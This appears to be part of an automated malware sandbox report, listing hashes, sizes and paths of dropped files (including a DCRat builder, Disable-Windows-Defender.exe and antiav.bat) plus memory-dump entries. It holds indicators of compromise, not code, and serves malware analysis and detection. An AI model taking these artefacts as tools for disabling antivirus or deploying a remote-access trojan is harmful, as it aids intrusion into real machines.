86e7bb59395c631340bd0e395e887f22cb2ce09c

SHA256
2695ac50c08d4236027ff0712477f2def9a06cee048d511bebec29424133f72b

SHA512
2bc3e60384c8d33f4e8dc113f68d848058fd14c1ad8fe63cc260caf4758b882fb0de6d1f849ea27edb94bc2c12a060bd3ea2840b9d04178b657dd88b1bdc833d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_4.zip
Filesize
791KB

MD5
fb9f071ef31c1d969079a9f6af71eb7a

SHA1
7f1d5b07be199d8e3b72563bd8e62734c28199d8

SHA256
0c42c46c4529b8645afd25e40201822d1ef0030c8df2ed0a675b3660a6682155

SHA512
908119ccaab46ada4c51cd8beadef25f4ad00756eb97cc0f8f808bf693429b85e4602fcad3e9beb0758f5dc42e2fddad56f5f5ec4ed7113d565a4983346b6eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_5.zip
Filesize
2.2MB

MD5
0033c62722f3495c210da055f7778dda

SHA1
c091c9610c822d109b992f01d7aa3e92ef5e2e2b

SHA256
be087d3597feb8e6b4b1473a4bfe781a02dab2ca5bd70e3de9f633fda966eec2

SHA512
7753a4c14c5b16aeab84a4e8f8e3a138b3d507a2e94612bb808460e5d44f6c08e7d9981aa935bc1e1cb6cf5a87f114175ba0d80e550c1e1ca0dfcfead33454df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.bin
Filesize
2.2MB

MD5
f99579a1f87b04503a749800c866dd6a

SHA1
7dfca154f7ef9b0516a446e43a950a462ddc8fba

SHA256
75005bfc6ba3b4472945adc5a12be1975c49ecd364c519cd78d6efa0a30301fe

SHA512
687626a621d0f3f8aa932adb13e6d93fd841510f73009ff4c917f1224d469600cac06468415bf76a45661c263ab90f1b7ed78e89a7747a1bb4f65fff8831d9ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.bat
Filesize
484B

MD5
e8aa101e7c64b2d2395b7ec7a82d97de

SHA1
5c4b751cb1616aed04bd6713fe575a68cd20f986

SHA256
4db448daf849172241b79e4078363dff7befb0aa8d45be9f3343c42e14e1a1ac

SHA512
1cc81b84af8b9db3b31bd788eabb255afa19255580acfac659b137f127319cf53129d73c5838b8790e16bd70ca9f23ca51b4e9e8e66541898ce163395f0a0a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
Filesize
58KB

MD5
b7352a9cde99367d4053d0de7431a181

SHA1
32d2046f588a98c1ea0fee63d1c275b34497ddea

SHA256
9dd0d5b5b5efe2433cfcbc3044d0219ffeb517c2cde4e705e52719ed15660a00

SHA512
8b6cee0cdd86c616e6a5e65bb08ad9df2926b5fa16b7186166e6fb69ca8eb3f1cef98f3e03ab2ae43c082b6acae82edd0a45d71df14b504ae7bf82da049796df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
Filesize
58KB

MD5
b7352a9cde99367d4053d0de7431a181

SHA1
32d2046f588a98c1ea0fee63d1c275b34497ddea

SHA256
9dd0d5b5b5efe2433cfcbc3044d0219ffeb517c2cde4e705e52719ed15660a00

SHA512
8b6cee0cdd86c616e6a5e65bb08ad9df2926b5fa16b7186166e6fb69ca8eb3f1cef98f3e03ab2ae43c082b6acae82edd0a45d71df14b504ae7bf82da049796df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
Filesize
626KB

MD5
e6b35b7105d4075e8b1eeb1e1f9207f4

SHA1
320fa7248cbc68493ea90eb08811c528ab143d24

SHA256
560d7540c620870d38a75633c99026c89ab15a142e59d77b195e2ea0fede31af

SHA512
5568b8686c2048ceadf7545736574528c7f65861e0d05886902d24d0988c8cc4f1d436b0839e78c94798f855c601f83898a36dd615c927a68be41610c93ae07d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
Filesize
626KB

MD5
e6b35b7105d4075e8b1eeb1e1f9207f4

SHA1
320fa7248cbc68493ea90eb08811c528ab143d24

SHA256
560d7540c620870d38a75633c99026c89ab15a142e59d77b195e2ea0fede31af

SHA512
5568b8686c2048ceadf7545736574528c7f65861e0d05886902d24d0988c8cc4f1d436b0839e78c94798f855c601f83898a36dd615c927a68be41610c93ae07d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsuD364.tmp\System.dll
Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
Filesize
7KB

MD5
463dba63615255f9e2f40e4323028f1d

SHA1
2cc71a0d934dfbd409349db59dc51d4b12bca3ca

SHA256
4eaf8bad5d130db8b39d8a1561f08ec457c4ff771eeda460a26cd432f42e8cfd

SHA512
1cd57f19c8f81eee36f647e4557a465075220b89b5fc46ef7992189c85f040fbfee7e62da9d896f618e176340423a634a9ac5b2085edfab1907672f65bcc7100

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
Filesize
7KB

MD5
463dba63615255f9e2f40e4323028f1d

SHA1
2cc71a0d934dfbd409349db59dc51d4b12bca3ca

SHA256
4eaf8bad5d130db8b39d8a1561f08ec457c4ff771eeda460a26cd432f42e8cfd

SHA512
1cd57f19c8f81eee36f647e4557a465075220b89b5fc46ef7992189c85f040fbfee7e62da9d896f618e176340423a634a9ac5b2085edfab1907672f65bcc7100

Download Submit
C:\Users\Admin\AppData\Roaming\1337\antiav.bat
Filesize
13KB

MD5
96e10d048d34ae83c462c3cc71c21314

SHA1
dc494c62fb67efcc318e54ca9ef15ea87ad24286

SHA256
c2686ead4dec80bdadd8c19e3128b70cf2512b1d016a80d4abea7109adf989e3

SHA512
f58ab0e108314f45c8b8b889a1958faf9b666de46f2c216b6f3737bb93c459e480d6a92184545a3bd9ab4104f955ef9d4fa9da3823d8b30191fa6770e126e4c3

Download Submit
C:\savesdll\H6tchIl3Mk5re1vJkxJB.exe
Filesize
463KB

MD5
b8669b7e0efc918720522345fc07c82b

SHA1
6da1d551461249cc6c99b3ae23dacbdd12e12fb7

SHA256
8543e36293585a248c57cd1fdc7bd0b87d0433b4fdc7858f5631e54ff4926e78

SHA512
abd102971b4819c9d6abbeb54718732e475a4b0bca05704e0141521bb6531aab1398c505042572ddff8be949f5b8c1cf546d52f16bca3382e7c2d27ee28f4352

Download Submit
C:\savesdll\H6tchIl3Mk5re1vJkxJB.exe
Filesize
463KB

MD5
b8669b7e0efc918720522345fc07c82b

SHA1
6da1d551461249cc6c99b3ae23dacbdd12e12fb7

SHA256
8543e36293585a248c57cd1fdc7bd0b87d0433b4fdc7858f5631e54ff4926e78

SHA512
abd102971b4819c9d6abbeb54718732e475a4b0bca05704e0141521bb6531aab1398c505042572ddff8be949f5b8c1cf546d52f16bca3382e7c2d27ee28f4352

Download Submit
C:\savesdll\brokersaves.exe
Filesize
450KB

MD5
9a5cd3f75a860a0fd35c9995d4ed2f18

SHA1
0454918baf6aa3b83eacad17dffaf9a1163ab071

SHA256
ee00e902dc356f7df7bf654b5f24522be47f4a6f65615f5fc8c664b3678acd8c

SHA512
d2aa89c86fec1178094143cf16b3c3ddf37fd2e0376f6ff78b2beec10c9f06d15a999282d6f3f7aedae923e0133dd39e6c9d65641a66e0bd0a45f4a4a313691b

Download Submit
C:\savesdll\brokersaves.exe
Filesize
450KB

MD5
9a5cd3f75a860a0fd35c9995d4ed2f18

SHA1
0454918baf6aa3b83eacad17dffaf9a1163ab071

SHA256
ee00e902dc356f7df7bf654b5f24522be47f4a6f65615f5fc8c664b3678acd8c

SHA512
d2aa89c86fec1178094143cf16b3c3ddf37fd2e0376f6ff78b2beec10c9f06d15a999282d6f3f7aedae923e0133dd39e6c9d65641a66e0bd0a45f4a4a313691b

Download Submit
C:\savesdll\lDVZCGY84K9R24Wa2h27nnSUIYjiBW.bat
Filesize
29B

MD5
2e9d9dbf2481fc85ee6536ad4ec7a1c3

SHA1
8dff9d4f19a72c1634b736a50d42dd74036a138b

SHA256
0203df6ff8f32c3b88f7c6eb4275cf6566b74c9855509c891e483f86361a4822

SHA512
638a801c663a59970693fe4abe51f29129d3a8f9a86fd248e33b15baeaf7ce5732a51ed085d2fcb4518c8b4e8e60e2dd4b6d6a10a985b852eebe0726171bd476

Download Submit
C:\savesdll\o23Lz8gEf67oDI4fnROiDtjkjP3rY3.vbe
Filesize
144B

MD5
c8a0888c17ce7d523cc119f379ef56e9

SHA1
0ef574904c28650df2890cf62dcc012be0e68a43

SHA256
47d9177aea3dc8767df226877f36bf930ee49e86fbcb5787653c88a8708b29f2

SHA512
0cec4a64afded268ef53db4b384d4029629143fb33b0fd43d7ca50262c8c99c37d840df43ffe91a5f373b8dc072315f287eb4b8b7959b42bf5c861ac029ba4d1

Download Submit
C:\savesdll\pdRmGrBBib01WWxpMtsEP4j1DJCMAO.vbe
Filesize
220B

MD5
d78bdfc97331f53e0cbc5377faca66cb

SHA1
7911114b8af5c5665f21db71bdede88a75a1a640

SHA256
8ced72e42f199ac8e63f56856c20c563c484f7a08a5e60f087c5424d12553828

SHA512
84afd09a6dde9e83732528f163ee0fb0701d5fe58a7d7aa269e4eaffed5a135d2d3b13df538765d8b0d2a719287dc0bd7a85c70e0708a5b25e685ddad2dd95d7

Download Submit
C:\savesdll\yJ6RfJ66NGEGI2MLhsk3DOjbzTL4AP.bat
Filesize
421B

MD5
c3ac6fddc33bc2ebcced5e493f54c4b4

SHA1
5e1468b2160359ca0eaa47e061d82f504b1382ab

SHA256
0ea0b2e90c4b84869581abbff9a31b60283a45c3ebaf06c16da4cb5aa05fa694

SHA512
120cf76ed2c4d2464f520771dc3d203d533cf148854f073d7cbb92c979593a0b33857f653521ab7f1d6508c5389d6a81612d8a865fbcfcdda9dd8987810e8935

Download Submit
memory/216-174-0x0000000000000000-mapping.dmp

Download
memory/396-231-0x0000000000000000-mapping.dmp

Download
memory/396-163-0x0000000000000000-mapping.dmp

Download
memory/400-144-0x0000000000000000-mapping.dmp

Download
memory/456-247-0x0000000000000000-mapping.dmp

Download
memory/640-193-0x0000000000000000-mapping.dmp

Download
memory/716-198-0x0000000000000000-mapping.dmp

Download
memory/716-246-0x0000000000000000-mapping.dmp

Download
memory/968-236-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/968-211-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/968-195-0x0000000000000000-mapping.dmp

Download
memory/1036-260-0x0000000000000000-mapping.dmp

Download
memory/1152-148-0x0000000000000000-mapping.dmp

Download
memory/1236-255-0x0000000000000000-mapping.dmp

Download
memory/1356-248-0x0000000000000000-mapping.dmp

Download
memory/1360-244-0x0000000000000000-mapping.dmp

Download
memory/1396-216-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/1396-240-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/1396-197-0x0000000000000000-mapping.dmp

Download
memory/1404-257-0x0000000000000000-mapping.dmp

Download
memory/1456-245-0x0000000000000000-mapping.dmp

Download
memory/1508-152-0x0000000000000000-mapping.dmp

Download
memory/1664-209-0x0000000000000000-mapping.dmp

Download
memory/1740-156-0x0000000000000000-mapping.dmp

Download
memory/1748-239-0x0000000000000000-mapping.dmp

Download
memory/1780-212-0x0000000000000000-mapping.dmp

Download
memory/1780-162-0x0000000000000000-mapping.dmp

Download
memory/1896-253-0x0000000000000000-mapping.dmp

Download
memory/1936-249-0x0000000000000000-mapping.dmp

Download
memory/2064-140-0x0000000000000000-mapping.dmp

Download
memory/2092-186-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2092-173-0x0000000000760000-0x0000000000768000-memory.dmp

Filesize
32KB

Download
memory/2092-200-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2092-169-0x0000000000000000-mapping.dmp

Download
memory/2296-207-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2296-227-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2296-187-0x0000000000000000-mapping.dmp

Download
memory/2312-263-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2312-217-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2312-199-0x0000000000000000-mapping.dmp

Download
memory/2424-194-0x0000000000000000-mapping.dmp

Download
memory/2512-251-0x0000000000000000-mapping.dmp

Download
memory/2548-189-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2548-222-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2548-181-0x0000000000000000-mapping.dmp

Download
memory/2552-201-0x0000000000000000-mapping.dmp

Download
memory/2600-196-0x0000000000000000-mapping.dmp

Download
memory/2600-234-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2600-214-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/2644-261-0x0000000000000000-mapping.dmp

Download
memory/2876-254-0x0000000000000000-mapping.dmp

Download
memory/2900-271-0x00007FFB80BA0000-0x00007FFB81661000-memory.dmp

Filesize
10.8MB

Download
memory/2900-270-0x00007FFB80BA0000-0x00007FFB81661000-memory.dmp

Filesize
10.8MB

Download
memory/2900-269-0x00000262F7A40000-0x00000262F7AB8000-memory.dmp

Filesize
480KB

Download
memory/2900-275-0x00007FFB80BA0000-0x00007FFB81661000-memory.dmp

Filesize
10.8MB

Download
memory/3036-256-0x0000000000000000-mapping.dmp

Download
memory/3132-179-0x0000000000000000-mapping.dmp

Download
memory/3148-182-0x0000000000000000-mapping.dmp

Download
memory/3404-203-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/3404-192-0x00000279EDF00000-0x00000279EDF22000-memory.dmp

Filesize
136KB

Download
memory/3404-224-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/3404-180-0x0000000000000000-mapping.dmp

Download
memory/3424-219-0x0000000000000000-mapping.dmp

Download
memory/3424-278-0x00007FFB80BA0000-0x00007FFB81661000-memory.dmp

Filesize
10.8MB

Download
memory/3424-277-0x00007FFB80BA0000-0x00007FFB81661000-memory.dmp

Filesize
10.8MB

Download
memory/3424-276-0x00007FFB80BA0000-0x00007FFB81661000-memory.dmp

Filesize
10.8MB

Download
memory/3484-243-0x0000000000000000-mapping.dmp

Download
memory/3524-183-0x0000000000000000-mapping.dmp

Download
memory/3524-205-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/3524-225-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/3572-210-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/3572-230-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/3572-191-0x0000000000000000-mapping.dmp

Download
memory/3868-258-0x0000000000000000-mapping.dmp

Download
memory/4048-218-0x0000000000000000-mapping.dmp

Download
memory/4196-172-0x0000000000000000-mapping.dmp

Download
memory/4296-178-0x0000000000000000-mapping.dmp

Download
memory/4344-241-0x0000000000000000-mapping.dmp

Download
memory/4376-134-0x0000000000000000-mapping.dmp

Download
memory/4380-242-0x0000000000000000-mapping.dmp

Download
memory/4388-252-0x0000000000000000-mapping.dmp

Download
memory/4496-215-0x0000000000000000-mapping.dmp

Download
memory/4496-262-0x0000000000000000-mapping.dmp

Download
memory/4576-206-0x0000000000000000-mapping.dmp

Download
memory/4592-259-0x0000000000000000-mapping.dmp

Download
memory/4632-136-0x0000000000000000-mapping.dmp

Download
memory/4704-184-0x0000000000000000-mapping.dmp

Download
memory/4724-232-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/4724-188-0x0000000000000000-mapping.dmp

Download
memory/4724-208-0x00007FFB80490000-0x00007FFB80F51000-memory.dmp

Filesize
10.8MB

Download
memory/4740-132-0x0000000000000000-mapping.dmp

Download
memory/4836-165-0x0000000000000000-mapping.dmp

Download
memory/5012-265-0x0000000000000000-mapping.dmp

Download
memory/5100-264-0x0000000000000000-mapping.dmp

Download
memory/5112-250-0x0000000000000000-mapping.dmp

Download